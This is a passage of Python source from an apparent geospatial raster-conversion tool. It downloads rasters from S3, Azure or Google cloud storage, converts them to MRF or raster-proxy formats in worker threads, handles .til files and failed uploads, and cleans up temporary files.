in_s3_id = os.environ[inputClientIdEnvToRead[cloudDownloadType]
] if inputClientIdEnvToRead[cloudDownloadType] in os.environ else None
in_s3_secret = os.environ[inputClientSecretEnvToRead[cloudDownloadType]
] if inputClientSecretEnvToRead[cloudDownloadType] in os.environ else None
in_s3_bucket = self._args.inputbucket
if (not in_s3_bucket):
inputBucketKeyToRead = {
Store.TypeAmazon: 'In_S3_Bucket',
Store.TypeAzure: 'In_Azure_Container',
Store.TypeGoogle: 'In_Google_Bucket'
}
in_s3_bucket = cfg.getValue(
inputBucketKeyToRead[cloudDownloadType], False)
if (in_s3_parent is None or
in_s3_bucket is None):
if (_rpt and
not _rpt._isInputHTTP):
self._base.message(
'Invalid/empty value(s) found in node(s) [In_S3_ParentFolder, In_S3_Bucket]', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# update (in s3 bucket name in config)
cfg.setValue('In_S3_Bucket', in_s3_bucket)
in_s3_parent = in_s3_parent.replace('\\', '/')
if (in_s3_parent[:1] == '/' and
not in_s3_parent.lower().endswith(Report.CJOB_EXT)):
in_s3_parent = in_s3_parent[1:]
cfg.setValue(CIN_S3_PARENTFOLDER, in_s3_parent)
if (cloudDownloadType == Store.TypeAmazon):
o_S3_storage = S3Storage(self._base)
ret = o_S3_storage.init(
in_s3_parent, in_s3_id, in_s3_secret, CS3STORAGE_IN)
if (not ret):
self._base.message(
'Unable to initialize S3-storage! Quitting..', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# handles EMC namespace cloud urls differently
if (str(o_S3_storage.con.meta.client._endpoint.host).lower().endswith('.ecstestdrive.com')):
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/http://{}.public.ecstestdrive.com/{}/'.format(
o_S3_storage.CAWS_ACCESS_KEY_ID.split('@')[0], o_S3_storage.m_bucketname))
else: # for all other standard cloud urls
domain = o_S3_storage.con.meta.client.generate_presigned_url(
'get_object', Params={'Bucket': o_S3_storage.m_bucketname, 'Key': ' '}).split('%20?')[0]
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/{}'.format(domain.replace('https', 'http')) if not o_S3_storage._isBucketPublic else
'/vsicurl/http://{}.{}/'.format(o_S3_storage.m_bucketname, CINOUT_S3_DEFAULT_DOMAIN)) # vsicurl doesn't like 'https'
o_S3_storage.inputPath = self._args.output
if (not o_S3_storage.getS3Content(o_S3_storage.remote_path, o_S3_storage.S3_copy_to_local, exclude_callback)):
self._base.message(
'Unable to read S3-Content', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
elif (cloudDownloadType == Store.TypeAzure):
# let's do (Azure) init
self._base.getUserConfiguration.setValue(
CIN_AZURE_CONTAINER, in_s3_bucket)
in_azure_storage = Azure(
in_s3_id, in_s3_secret, in_s3_profile_name, self._base)
if (not in_azure_storage.init() or
not in_azure_storage.getAccountName):
self._base.message('({}) download initialization error. Check input credentials/profile name. Quitting..'.format(
CCLOUD_AZURE.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
in_azure_storage._include_subFolders = self._base.getBooleanValue(
cfg.getValue('IncludeSubdirectories'))
_restored = cfg.getValue(CLOAD_RESTORE_POINT)
_azParent = self._args.input
if (not _restored):
in_azure_storage._mode = in_azure_storage.CMODE_SCAN_ONLY
else:
_azParent = '/' if not _rpt else _rpt.root
if (not _azParent.endswith('/')):
_azParent += '/'
cfg.setValue(CIN_AZURE_PARENTFOLDER, _azParent)
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/{}'.format('{}/{}/'.format(
in_azure_storage.getAccountName, cfg.getValue('In_S3_Bucket'))))
if (not in_azure_storage.browseContent(in_s3_bucket, _azParent, in_azure_storage.copyToLocal, exclude_callback)):
return(terminate(self._base, eFAIL))
if (not _restored):
_files = in_azure_storage.getBrowseContent()
if (_files):
for f in _files:
fn_collect_input_files(f)
elif (cloudDownloadType == Store.TypeGoogle):
inGoogleStorage = Google(
None, in_s3_id, in_s3_secret, in_s3_profile_name, self._base)
if (not inGoogleStorage.init(in_s3_bucket)):
self._base.message('({}) download initialization error. Check input credentials/profile name. Quitting..'.format(
Store.TypeGoogle.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
inGoogleStorage._include_subFolders = self._base.getBooleanValue(
cfg.getValue('IncludeSubdirectories'))
restored = cfg.getValue(CLOAD_RESTORE_POINT)
gsParent = self._args.input
if (not restored):
inGoogleStorage._mode = inGoogleStorage.CMODE_SCAN_ONLY
else:
gsParent = '/' if not _rpt else _rpt.root
if (not gsParent.endswith('/')):
gsParent += '/'
cfg.setValue(CIN_GOOGLE_PARENTFOLDER, gsParent)
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/{}'.format(
'{}{}/'.format(Google.DafaultStorageDomain, self._args.inputbucket)))
if (not inGoogleStorage.browseContent(in_s3_bucket, gsParent, inGoogleStorage.copyToLocal, exclude_callback)):
return(terminate(self._base, eFAIL))
if (not restored):
_files = inGoogleStorage.getBrowseContent()
if (_files):
for f in _files:
fn_collect_input_files(f)
pass
# ends
# ends
# control flow if conversions required.
if (not is_caching):
isDirectInput = filterPaths(
self._args.input, cfg.getValue(CCFG_RASTERS_NODE))
if (not isinput_s3 and
not cfg_mode == BundleMaker.CMODE and
not isDirectInput):
ret = cpy.init(self._args.input, self._args.tempoutput if is_output_temp and self._base.getBooleanValue(
cfg.getValue(CCLOUD_UPLOAD)) else self._args.output, list, callbacks, cfg)
if (not ret):
self._base.message(
CONST_CPY_ERR_0, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
ret = cpy.processs(self._base.S3Upl if is_cloud_upload else None,
user_args_Callback, fn_pre_process_copy_default)
if (not ret):
self._base.message(
CONST_CPY_ERR_1, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (is_input_temp):
pass # no post custom code yet for non-rasters
if (cfg_mode == BundleMaker.CMODE):
p, f = os.path.split(self._args.input if not cfg.getValue(
CLOAD_RESTORE_POINT) else self._base.convertToForwardSlash(_rpt._input_list[0], False))
raster_buff = [{'dst': self._args.output,
'f': f,
'src': p}]
files = raster_buff
files_len = len(files)
if (files_len):
if (is_input_temp and
not isinput_s3 and
not cfg.getValue(CLOAD_RESTORE_POINT)):
# if the -tempinput path is defined, we first copy rasters from the source path to -tempinput before any conversion.
self._base.message(
'Copying files to -tempinput path (%s)' % (cfg.getValue(CTEMPINPUT, False)))
cpy_files_ = []
for i in range(0, len(files)):
get_dst_path = files[i]['dst'].replace(self._args.output if cfg.getValue(
CTEMPOUTPUT, False) is None else cfg.getValue(CTEMPOUTPUT, False), cfg.getValue(CTEMPINPUT, False))
cpy_files_.append(
{
'src': files[i]['src'],
'dst': get_dst_path,
'f': files[i]['f']
})
files[i]['src'] = get_dst_path
cpy.batch(cpy_files_, None)
self._base.message('Converting..')
# collect all the input raster files.
if (g_is_generate_report and
g_rpt):
for req in files:
_src = '{}{}{}'.format(req['src'], '/' if not req['src'].replace(
'\\', '/').endswith('/') and req['src'] else '', req['f'])
if (self._base.getBooleanValue(cfg.getValue(CISTEMPINPUT))):
_tempinput = cfg.getValue(CTEMPINPUT, False)
_tempinput = _tempinput[:-1] if _tempinput.endswith(
'/') and not self._args.input.endswith('/') else _tempinput
_src = _src.replace(_tempinput, self._args.input)
# prior to this point, rasters get added to g_rpt during the (pull/copy) process if -clouddownload=true && -tempinput is defined.
g_rpt.addFile(_src)
self._base.message('{}'.format(
CRESUME_CREATE_JOB_TEXT).format(_project_path))
for arg in vars(self._args):
val = getattr(self._args, arg)
if (arg == CRESUME_HDR_INPUT):
f, e = os.path.splitext(val)
if (len(e) != 0):
val = val[:val.rindex('/') + 1]
g_rpt.addHeader(arg, val)
g_rpt.write()
if (self.isOperationCreateJob):
return self.__initOperationCreateJob()
# process @ lambda?
if (self._isLambdaJob()):
_rpt = Report(self._base)
if (not _rpt.init(_project_path) or
not _rpt.read()):
self._base.message('Unable to read the -input report file ({})'.format(
self._args.input), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
self._base.getUserConfiguration.setValue(
CPRT_HANDLER, _rpt)
ret = eOK if self._runLambdaJob(
g_rpt._report_file) else eFAIL
if (ret == eOK):
if (self._args.op != COP_LAMBDA): # synchronous call.
self._moveJobFileToLogPath()
return(terminate(self._base, ret))
# ends
self._args.op = None
self._args.input = _project_path
cfg.setValue(CLOAD_RESTORE_POINT, True)
self.run()
return
# ends
raster_buff = files
len_buffer = cfg_threads
threads = []
store_files_indx = 0
store_files_len = len(raster_buff)
while(1):
len_threads = len(threads)
while(len_threads):
alive = [t.is_alive() for t in threads]
cnt_dead = sum(not x for x in alive)
if (cnt_dead):
len_buffer = cnt_dead
threads = [t for t in threads if t.is_alive()]
break
buffer = []
for i in range(0, len_buffer):
if (store_files_indx == store_files_len):
break
buffer.append(raster_buff[store_files_indx])
store_files_indx += 1
if (not buffer and
not threads):
break
for req in buffer:
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], isinput_s3)
f, e = os.path.splitext(output_file)
if (not cfg_keep_original_ext):
modeExtension = cfg_mode.split('_')[0]
if (modeExtension.lower() == e[1:].lower()):
# keep the input extension case. This will ensure the file status gets updated properly in the orjob file.
modeExtension = e[1:]
output_file = output_file.replace(
e, '.{}'.format(modeExtension))
_build_pyramids = True
if (til):
if (til.find(req['f'])):
# increment the process counter if the raster belongs to a (til) file.
til.addFileToProcessed(req['f'])
# build pyramids is always turned off for rasters that belong to (.til) files.
_build_pyramids = False
useBundleMaker = cfg_mode == BundleMaker.CMODE
if (useBundleMaker):
bundleMaker = BundleMaker(
input_file, gdal_path, base=self._base)
if (not bundleMaker.init()):
continue
t = threading.Thread(target=bundleMaker.run)
else:
doProcessRaster = True
if (til is not None and
til.defaultTILProcessing and
til.fileTILRelated(os.path.basename(input_file))):
# skip processing individual rasters/tiffs referenced by the .til files. Ask GDAL to process .til without any custom OR logic involved.
doProcessRaster = False
if (not isinput_s3):
processedPath = output_file
if (self._base.getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
if (not is_cloud_upload):
processedPath = processedPath.replace(
req['dst'], self._args.output)
if (self._base.getBooleanValue(cfg.getValue(CISTEMPINPUT))):
try:
shutil.move(input_file, processedPath)
except Exception as e:
self._base.message('TIL/[MV] ({})->({})\n{}'.format(
input_file, processedPath, str(e)), self._base.const_critical_text)
else:
try:
shutil.copy(input_file, processedPath)
except Exception as e:
self._base.message('TIL/[CPY] ({})->({})\n{}'.format(
input_file, processedPath, str(e)), self._base.const_critical_text)
if (doProcessRaster):
t = threading.Thread(target=comp.compress,
args=(input_file, output_file, args_Callback, _build_pyramids, self._base.S3Upl if is_cloud_upload else fn_copy_temp_dst if is_output_temp and not is_cloud_upload else None, user_args_Callback), kwargs={'name': os.path.join(req['src'], req['f'])})
t.daemon = True
t.start()
threads.append(t)
# til work
if (til):
for _til in til:
_doPostProcessing = True
if (cfg.getValue(CLOAD_RESTORE_POINT)):
if (_rpt.getRecordStatus(_til, CRPT_PROCESSED) == CRPT_YES):
self._base.message('{} {}'.format(
CRESUME_MSG_PREFIX, _til))
_doPostProcessing = False
if (not til.isAllFilesProcessed(_til)):
if (_doPostProcessing):
self._base.message(
'TIL> Not yet completed for ({})'.format(_til))
if (til.isAllFilesProcessed(_til)):
til_output_path = til.getOutputPath(_til)
if (_doPostProcessing):
if (not til_output_path):
self._base.message(
'TIL output-path returned empty/Internal error', self._base.const_warning_text)
continue
if (not til.defaultTILProcessing):
ret = comp.createaOverview(til_output_path)
if (not ret):
self._base.message('Unable to build pyramids on ({})'.format(
til_output_path), self._base.const_warning_text)
continue
tilOutputExtension = 'mrf'
# keys in TIL._tils_info are in lowercase.
tilsInfoKey = _til.lower()
ret = comp.compress('{}{}'.format(til_output_path, '.ovr' if not til.defaultTILProcessing else ''), '{}.{}'.format(
til_output_path, tilOutputExtension), args_Callback, name=til_output_path)
if (not ret):
self._base.message('Unable to convert (til.ovr=>til.mrf) for file ({}.ovr)'.format(
til_output_path), self._base.const_warning_text)
continue
try:
# remove all the internally referenced (raster/tiff) files by the .TIL file that are no longer needed post conversion.
if (til.defaultTILProcessing):
for associate in til._tils_info[tilsInfoKey][TIL.CKEY_FILES]:
processedPath = os.path.join(
os.path.dirname(til_output_path), associate)
try:
os.remove(processedPath)
except Exception as e:
self._base.message(
str(e), self._base.const_critical_text)
continue
else:
# let's rename (.mrf) => (.ovr)
os.remove('{}.ovr'.format(til_output_path))
os.rename('{}.mrf'.format(
til_output_path), '{}.ovr'.format(til_output_path))
except Exception as e:
self._base.message('({})'.format(
str(e)), self._base.const_warning_text)
continue
# update .ovr file updates at -clonepath
try:
if (self._args.clonepath):
_clonePath = til_output_path.replace(self._args.output if not self._args.tempoutput or (
self._args.tempoutput and not self._base.getBooleanValue(self._args.cloudupload)) else self._args.tempoutput, '')
_mk_input_path = os.path.join(
self._args.clonepath, '{}.mrf'.format(_clonePath))
doc = minidom.parse(_mk_input_path)
xmlString = doc.toxml()
xmlString = xmlString.replace(
'.mrf<', '.ovr<')
xmlString = xmlString.replace('.{}'.format(
CCACHE_EXT), '.ovr.{}'.format(CCACHE_EXT))
_indx = xmlString.find(
'<{}>'.format(CMRF_DOC_ROOT))
if (_indx == -1):
raise Exception(
'Err. Invalid MRF/header')
xmlString = xmlString[_indx:]
_mk_save_path = '{}{}.ovr'.format(
self._args.clonepath, _clonePath.replace('.mrf', ''))
with open(_mk_save_path, 'w+') as _fpOvr:
_fpOvr.write(xmlString)
except Exception as e:
self._base.message('Unable to update .ovr for [{}] ({})'.format(
til_output_path, str(e)), self._base.const_warning_text)
continue
# ends
# upload (til) related files (.idx, .ovr, .lrc)
if (is_cloud_upload and
S3_storage):
ret = S3_storage.upload_group(
'{}.CHS'.format(til_output_path))
retry_failed_lst = []
failed_upl_lst = S3_storage.getFailedUploadList()
if (failed_upl_lst):
[retry_failed_lst.append(
_x['local']) for _x in failed_upl_lst['upl']]
# let's delete all the associate files related to (TIL) files.
if (self._base.getBooleanValue(cfg.getValue(COUT_DELETE_AFTER_UPLOAD))):
(p, n) = os.path.split(til_output_path)
for r, d, f in os.walk(p):
for file in f:
if (r != p):
continue
mk_filename = os.path.join(
r, file).replace('\\', '/')
if (til.fileTILRelated(mk_filename)):
# Don't delete files included in the (failed upload list)
if (mk_filename in retry_failed_lst):
continue
try:
self._base.message(
'[Del] {}'.format(mk_filename))
os.remove(mk_filename)
except Exception as e:
self._base.message('[Del] Err. {} ({})'.format(
mk_filename, str(e)), self._base.const_critical_text)
# ends
# ends
# ends
# block to deal with caching ops.
if (is_caching and
do_pyramids != CCMD_PYRAMIDS_ONLY):
if (not g_is_generate_report):
self._base.message('\nProcessing caching operations...')
if (not isinput_s3):
raster_buff = []
if (cfg_mode == 'splitmrf'): # set explicit (exclude list) for mode (splitmrf)
list['exclude']['idx'] = ''
ret = cpy.init(self._args.input, self._args.output,
list, callbacks_for_meta, cfg)
if (not ret):
self._base.message(
CONST_CPY_ERR_0, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
ret = cpy.processs(
pre_processing_callback=fn_pre_process_copy_default)
if (not ret):
self._base.message(
CONST_CPY_ERR_1, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (g_is_generate_report and
g_rpt):
for req in raster_buff:
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], isinput_s3)
_src = '{}{}{}'.format(req['src'], '/' if not req['src'].replace(
'\\', '/').endswith('/') and req['src'] != '' else '', req['f'])
g_rpt.addFile(_src)
self._base.message('{}'.format(
CRESUME_CREATE_JOB_TEXT).format(_project_path))
# Uploading is disabled for modes related to caching.
self._args.cloudupload = 'false'
for arg in vars(self._args):
g_rpt.addHeader(arg, getattr(self._args, arg))
g_rpt.write()
if (self.isOperationCreateJob):
return self.__initOperationCreateJob()
self._args.op = None
# preserve the original -input path
cfg.setValue(CCMD_ARG_INPUT, self._args.input)
self._args.input = _project_path
cfg.setValue(CLOAD_RESTORE_POINT, True)
self.run()
return
makedirs(self._args.output) # prepare output dirs.
len_buffer = cfg_threads
threads = []
store_files_indx = 0
store_files_len = len(raster_buff)
while(1):
len_threads = len(threads)
while(len_threads):
alive = [t.is_alive() for t in threads]
cnt_dead = sum(not x for x in alive)
if (cnt_dead):
len_buffer = cnt_dead
threads = [t for t in threads if t.is_alive()]
break
buffer = []
for i in range(0, len_buffer):
if (store_files_indx == store_files_len):
break
buffer.append(raster_buff[store_files_indx])
store_files_indx += 1
if (not buffer and
not threads):
break
setPreAssignedURL = False
# enabled only for 'amazon' for now.
if (cloudDownloadType == Store.TypeAmazon):
if (isinput_s3 and
o_S3_storage is not None):
setPreAssignedURL = True
elif(cloudDownloadType == Store.TypeAzure):
if (isinput_s3 and
in_azure_storage is not None):
setPreAssignedURL = True
for f in buffer:
try:
if (setPreAssignedURL):
preAkey = '{}{}'.format(f['src'], f['f'])
if (cloudDownloadType == Store.TypeAmazon):
if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseToken))):
resp = o_S3_storage.con.meta.client.get_object(Bucket=o_S3_storage.m_bucketname, Key=preAkey) # , Range='bytes={}-{}'.format(0, 4))
self._args.preFetchedMRF = resp['Body'].read()
else:
self._args.preAssignedURL = o_S3_storage.con.meta.client.generate_presigned_url(
'get_object', Params={'Bucket': o_S3_storage.m_bucketname, 'Key': preAkey})
else:
if (not cfg.getValue(CFGAZSAS)):
from azure.storage.blob import ResourceTypes, AccountSasPermissions, generate_account_sas
SAS = generate_account_sas(in_azure_storage._blob_service.account_name, in_azure_storage._blob_service.credential.account_key, resource_types=ResourceTypes(object=True),
permission=AccountSasPermissions(
read=True),
expiry=datetime.utcnow() + timedelta(hours=1))
self._args.preAssignedURL = '{}/{}/{}?{}'.format(
in_azure_storage._account_name, in_s3_bucket, preAkey, SAS)
t = threading.Thread(target=threadProxyRaster, args=(
f, self._base, comp, self._args))
t.daemon = True
t.start()
threads.append(t)
except Exception as e:
self._base.message('Err. {}'.format(
str(e)), self._base.const_critical_text)
continue
# do we have failed upload files on list?
if (is_cloud_upload and
S3_storage):
if (cfg.getValue(COUT_CLOUD_TYPE) == CCLOUD_AMAZON):
failed_upl_lst = S3_storage.getFailedUploadList()
if (failed_upl_lst):
self._base.message(
'Retry - Failed upload list.', const_general_text)
_fptr = None
if (self._log_path):
try:
if (not os.path.isdir(self._log_path)):
makedirs(self._log_path)
ousr_date = datetime.now()
err_upl_file = os.path.join(self._log_path, '%s_UPL_ERRORS_%04d%02d%02dT%02d%02d%02d.txt' % (cfg.getValue(CPRJ_NAME, False), ousr_date.year, ousr_date.month, ousr_date.day,
ousr_date.hour, ousr_date.minute, ousr_date.second))
_fptr = open(err_upl_file, 'w+')
except BaseException:
pass
for v in failed_upl_lst['upl']:
self._base.message(
'%s' % (v['local']), const_general_text)
ret = S3_storage.upload_group(v['local'])
# the following files will be logged as unsuccessful uploads to output cloud
if (not ret):
if (_fptr):
_fptr.write('{}\n'.format(v['local']))
if (_rpt): # Do we have an input file list?
if ('local' in v):
_local = v['local']
if (_local):
setUploadRecordStatus(_local, CRPT_NO)
# ends
for r in ret:
try:
self._base.message('[Del] {}'.format(r))
try:
os.remove(r)
except BaseException:
time.sleep(CDEL_DELAY_SECS)
os.remove(r)
except Exception as e:
self._base.message(
'[Del] {} ({})'.format(r, str(e)))
if (_fptr):
_fptr.close()
_fptr = None
# ends
# let's clean-up rasters @ -tempinput path
if (is_input_temp and
not is_caching): # if caching is (True), -tempinput is ignored and no deletion of source @ -input takes place.
if (len(raster_buff) != 0):
self._base.message('Removing input rasters at ({})'.format(
cfg.getValue(CTEMPINPUT, False)))
for req in raster_buff:
doRemove = True
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], isinput_s3)
try:
if (_rpt):
if (_rpt.getRecordStatus('{}{}'.format(req['src'], req['f']), CRPT_PROCESSED) == CRPT_NO):
doRemove = False
if (doRemove and
os.path.exists(input_file)):
self._base.message('[Del] {}'.format(input_file))
os.remove(input_file)
except Exception as e:
self._base.message('[Del] {} ({})'.format(
input_file, str(e)), self._base.const_warning_text)
if (_rpt and
doRemove):
primaryExt = _rpt._m_rasterAssociates.findExtension(
input_file)
if (primaryExt):
raInfo = _rpt._m_rasterAssociates.getInfo()
if (raInfo and
primaryExt in raInfo):
self._base.message(
'Removing associated files for ({})'.format(input_file))
for relatedExt in raInfo[primaryExt].split(';'):
try:
_mkPrimaryRaster = '{}{}'.format(
input_file[:len(input_file) - len(primaryExt)], relatedExt)
if (os.path.exists(_mkPrimaryRaster)):
self._base.message(
'[Del] {}'.format(_mkPrimaryRaster))
os.remove(_mkPrimaryRaster)
except Exception as e:
self._base.message('[Del] {} ({})'.format(
_mkPrimaryRaster, str(e)), self._base.const_warning_text)
self._base.message('Done.')
# ends
if (not raster_buff):
# it's possible to have empty {CCFG_RASTERS_NODE} raster extensions. e.g configs for op=copyonly
if (len(cfg.getValue(CCFG_RASTERS_NODE))):
self._base.message(
'No input rasters to process..', self._base.const_warning_text)
# ends
_status = eOK
# write out the (job file) with updated status.
if (_rpt):
if (not _rpt.write() or
_rpt.hasFailures()):
_status = eFAIL
if (_status == eOK):
if (not CRUN_IN_AWSLAMBDA):
_status = self._moveJobFileToLogPath()
timeReport = self._args.timeit
if (timeReport):
# write the execution time details report
_rpt.writeTimeItReport(timeReport)
# ends
# write out the raster proxy .csv file
if (self._base._isRasterProxyFormat('csv')):
pfname = cfg.getValue('rpfname', False)
if (pfname):
with open(pfname, 'a') as rpWriter:
rpWriter.write('ObjectID;Raster\n')
for i in range(0, len(self._base._modifiedProxies)):
proxyStr = self._base._modifiedProxies[i]
proxyStr = ' '.join(
proxyStr.split()).replace('"', '\'')
proxyStr = '><'.join(proxyStr.split('> <'))
rpWriter.write('{};{}\n'.format(i + 1, proxyStr))
# ends
self._base.message('Done..\n')
return(terminate(self._base, _status))
def _moveJobFileToLogPath(self):
    """Move the finished (.orjob) job/report file into the log folder.

    Returns eOK on success or when the move is deliberately skipped
    (KeepLogFile requested via the config template or the .orjob header);
    eFAIL when prerequisites are missing or the move itself fails.
    """
    global _rpt
    global cfg
    # Both the app base object and the global report must exist to proceed.
    if (self._base is None or
            _rpt is None):
        return eFAIL
    status = eOK
    txtInConfig = 'KeepLogFile'
    txtInRPT = txtInConfig.lower()  # .orjob header keys are stored lowercase.
    # No message handler means no log folder to move into; treat as a no-op.
    if (self._base.getMessageHandler is None):
        return status
    # User asked (via config) to keep the job file where it is.
    if (self._base.getBooleanValue(cfg.getValue(txtInConfig))):
        return status
    # The same setting may also arrive through the .orjob file header.
    if (txtInRPT in _rpt._header):
        if (self._base.getBooleanValue(_rpt._header[txtInRPT])):
            return status
    defLogFolder = self._base.getMessageHandler.logFolder
    # client apps can override the LogPath in the template.
    usrLogFolder = self._base.getUserConfiguration.getValue(CFGLogPath)
    if (not _rpt.moveJobFileToPath(defLogFolder if usrLogFolder is None else usrLogFolder)):
        self._base.message(
            'Unable to move the .orjob file to the log path.', self._base.const_warning_text)
        status = eFAIL
    return status
def threadProxyRaster(req, base, comp, args):
    """Worker-thread entry point: turn one input raster entry into a raster
    proxy (.mrf) output.

    req    : dict with 'src', 'dst', 'f' (source folder, destination folder,
             file name) describing the raster to process.
    base   : shared application base (messaging, config, boolean parsing).
    comp   : compression helper used for the non-MRF conversion path.
    args   : parsed command-line namespace (may carry preFetchedMRF /
             preAssignedURL set by the dispatcher for cloud inputs).

    Returns True on success, False on any failure; failures are also
    recorded against the global report (_rpt) when one is active.
    """
    usrConfig = base.getUserConfiguration
    (inputFile, outputFile) = getInputOutput(
        req['src'], req['dst'], req['f'], base.getBooleanValue(args.clouddownload))
    (f, ext) = os.path.splitext(req['f'])
    # Key used to address this raster in the report file.
    rptName = os.path.join(req['src'], req['f'])
    if (not base.getBooleanValue(usrConfig.getValue('KeepExtension'))):
        outputFile = outputFile.replace(ext, CONST_OUTPUT_EXT)
    finalPath = outputFile
    isTempOut = base.getBooleanValue(usrConfig.getValue(CISTEMPOUTPUT))
    if (isTempOut):
        # Outputs are staged under -tempoutput first; compute final location.
        finalPath = outputFile.replace(args.tempoutput, args.output)
    mode = usrConfig.getValue('Mode')
    bytesAtHeader = None
    isInputMRF = False
    if (mode != 'splitmrf'):
        if (mode == 'rasterproxy'):
            # Determine file type by reading few bytes off its header.
            sigMRF = '<{}>'.format(CMRF_DOC_ROOT.lower())[
                :4]  # mrf XML root node
            # reading as small as possble to determine the correct type to avoid large data transfers for bigger .orjob files.
            sigMRFLength = len(sigMRF)
            remoteURL = None
            isPreFetchedMRF = True if (hasattr(
                args, 'preFetchedMRF') and args.preFetchedMRF is not None) else False
            bytesAtHeader = args.preFetchedMRF[:sigMRFLength] if isPreFetchedMRF else None
            if (not isPreFetchedMRF):
                if (inputFile.startswith(CVSICURL_PREFIX)):
                    # Remote input: fetch just the first header bytes over HTTP.
                    dnVSICURL = inputFile.split(CVSICURL_PREFIX)[1]
                    remoteReader = None
                    # Prefer a pre-signed URL when the dispatcher provided one.
                    remoteURL = args.preAssignedURL if (hasattr(
                        args, 'preAssignedURL') and args.preAssignedURL is not None) else dnVSICURL
                    try:
                        remoteReader = urlopen(remoteURL)
                        bytesAtHeader = remoteReader.read(sigMRFLength)
                    except Exception as e:
                        base.message(str(e), base.const_critical_text)
                        if (_rpt):
                            _rpt.updateRecordStatus(
                                rptName, CRPT_PROCESSED, CRPT_NO)
                        return False
                    finally:
                        if (remoteReader):
                            remoteReader.close()
                else:
                    # Local input: read the header bytes directly off disk.
                    try:
                        with open(inputFile, 'rb') as fptrProxy:
                            bytesAtHeader = fptrProxy.read(sigMRFLength)
                    except Exception as e:
                        base.message(str(e), base.const_critical_text)
                        if (_rpt):
                            _rpt.updateRecordStatus(
                                rptName, CRPT_PROCESSED, CRPT_NO)
                        return False
            if (bytesAtHeader):
                # Default to caching unless the header proves it's an MRF doc.
                mode = 'cachingmrf'
                if (isinstance(bytesAtHeader, bytes)):
                    try:
                        bytesAtHeader = bytesAtHeader.decode('utf-8')
                    except BaseException:
                        pass  # ignore any invalid start byte issues.
                if (bytesAtHeader.lower() == sigMRF):
                    # The input is itself an MRF document; clone instead.
                    isInputMRF = True
                    mode = 'clonemrf'
                    contents = None
                    if (inputFile.startswith(CVSICURL_PREFIX)):
                        remoteReader = None
                        try:
                            # Reuse the pre-fetched body when available.
                            contents = args.preFetchedMRF if isPreFetchedMRF else contents
                            if (not isPreFetchedMRF):
                                remoteReader = urlopen(remoteURL)
                                contents = remoteReader.read()
                            if (not base._isRasterProxyFormat('csv')):
                                with open(outputFile, 'wb') as writer:
                                    writer.write(contents)
                            # <Rsets> presence indicates source pyramids.
                            srcPyramids = contents.find(b'<Rsets') != -1
                            if (_rpt):
                                ret = _rpt.addMetadata(
                                    rptName, 'isuniformscale', srcPyramids)
                        except Exception as e:
                            base.message(str(e), base.const_critical_text)
                            if (_rpt):
                                _rpt.updateRecordStatus(
                                    rptName, CRPT_PROCESSED, CRPT_NO)
                            return False
                        finally:
                            if (remoteReader):
                                remoteReader.close()
                    else:
                        try:
                            with open(inputFile, 'rb') as proxyReader:
                                contents = proxyReader.read()
                            if (contents is not None):
                                if (isInputMRF):
                                    if (not base._isRasterProxyFormat('csv')):
                                        with open(outputFile, 'wb') as writer:
                                            writer.write(contents)
                                    srcPyramids = contents.find(
                                        b'<Rsets') != -1
                                    if (_rpt):
                                        ret = _rpt.addMetadata(
                                            inputFile, 'isuniformscale', srcPyramids)
                        except Exception as e:
                            base.message(str(e), base.const_critical_text)
                            if (_rpt):
                                _rpt.updateRecordStatus(
                                    rptName, CRPT_PROCESSED, CRPT_NO)
                            return False
                    if (contents is not None):
                        # Non-LERC MRFs are handled via the caching path.
                        if (contents.find(b'<Compression>LERC') == -1):
                            mode = 'cachingmrf'
    # ends
    if (not isInputMRF):
        # Regular raster: run it through the compression pipeline.
        ret = comp.compress(inputFile, outputFile, args_Callback_for_meta,
                            post_processing_callback=fn_copy_temp_dst if isTempOut else None, name=rptName)
    else:
        # Already an MRF: a straight file copy to the final location suffices.
        try:
            shutil.copyfile(inputFile, finalPath)
        except Exception as e:
            base.message('[CPY] {} ({})'.format(
                inputFile, str(e)), base.const_critical_text)
            return False
    if (not os.path.exists(finalPath)):
        # Missing output is only acceptable for the csv raster-proxy format.
        if (not base._isRasterProxyFormat('csv')):
            return False
    # update .mrf.
    updateMRF = UpdateMRF(base)
    homePath = args.output
    inputMRF = finalPath
    if (isInputMRF):
        homePath = req['src']
        if (not isPreFetchedMRF):
            inputMRF = inputFile
        if (args.clouddownload and
                inputFile.startswith(CVSICURL_PREFIX)):
            if (not isPreFetchedMRF):
                inputMRF = remoteURL
    if (updateMRF.init(inputMRF, args.output, mode,
                       args.cache, homePath, usrConfig.getValue(COUT_VSICURL_PREFIX, False))):
        if (not updateMRF.update(finalPath, trueInput=inputFile)):
            base.message('Updating ({}) was not successful!'.format(
                finalPath), base.const_critical_text)
            return False
    # ends
    # remove ancillary extension files that are no longer required for (rasterproxy) files on the client side.
    errorEntries = RasterAssociates.removeRasterProxyAncillaryFiles(finalPath)
    if (errorEntries):
        for err in errorEntries:
            base.message('Unable to delete ({})'.format(
                err), base.const_warning_text)
    # ends
    return True
def main():
    """Command-line entry point.

    Builds the argument parser, initializes the Application and runs the
    conversion job, printing the total wall-clock time at the end.
    Returns the job status (eOK / eFAIL) for use as the process exit code.
    """
    optional = '[Optional]'
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '-mode', help='Processing mode/output format', dest='mode')
    parser.add_argument(
        '-input', help='Input raster files directory/job file to resume', dest=CRESUME_HDR_INPUT)
    parser.add_argument('-output', help='Output directory',
                        dest=CRESUME_HDR_OUTPUT)
    parser.add_argument(
        '-subs', help='Include sub-directories in -input? [true/false]', dest='subs')
